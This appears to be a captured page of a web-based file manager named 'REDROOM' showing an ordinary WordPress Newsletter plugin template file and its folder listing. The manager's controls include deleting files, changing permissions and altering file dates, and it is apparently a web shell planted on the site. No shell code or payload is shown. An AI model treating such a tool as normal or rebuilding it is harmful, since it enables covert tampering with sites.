REDROOM
PHP 8.2.31
Path:
Logout
Edit File
Size: 1.05 KB
Close
/home/nshryvcy/blissfulnepal.com/wp-content/plugins/newsletter/emails/blocks/html/block.php
Text
Base64
<?php /* * Name: Html * Section: content * Description: Free HTML block * */ /** @var array $options */ /** @var array $composer */ $defaults = array( 'html'=>'This is a piece of nice html code. You can use any tag, but be aware that email readers do not render everything.', 'block_padding_left' => 15, 'block_padding_right' => 15, 'block_padding_top' => 20, 'block_padding_bottom' => 20, 'block_background' => '', 'font_family' => '', 'font_size' => '', 'font_color' => '', 'font_weight' => '', ); $options = array_merge($defaults, $options); $title_style = TNP_Composer::get_text_style($options, '', $composer); ?> <style> .html-td { <?php $title_style->echo_css()?> padding: 0; line-height: normal !important; letter-spacing: normal; } </style> <table width="100%" border="0" cellpadding="0" cellspacing="0" role="presentation"> <tr> <td valign="top" inline-class="html-td" class="html-td-global"> <?php echo $options['html'] ?> </td> </tr> </table>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 4
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
block.php
1.05 KB
lrw-r--r--
2026-06-03 14:57:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
icon.png
2.38 KB
lrw-r--r--
2026-06-03 14:57:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
options.php
1.26 KB
lrw-r--r--
2026-06-03 14:57:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
style.css
94 B
lrw-r--r--
2026-06-03 14:57:28
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).